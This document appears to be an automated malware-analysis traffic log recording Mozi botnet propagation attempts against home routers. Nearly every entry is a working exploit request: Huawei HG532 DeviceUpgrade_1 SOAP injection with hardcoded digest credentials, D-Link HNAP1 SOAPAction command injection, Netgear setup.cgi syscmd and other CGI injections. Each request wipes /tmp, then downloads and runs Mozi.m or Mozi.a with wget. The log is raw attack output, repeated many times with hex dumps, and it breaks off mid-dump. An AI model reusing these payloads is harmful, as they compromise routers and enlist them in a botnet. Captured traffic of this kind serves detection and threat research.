                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 139.19.245.50:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 183.252.240.123:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 218.165.242.77:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 69.218.122.161:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 141.74.108.60:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 174.68.245.171:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 172.175.234.32:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 222.32.92.206:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 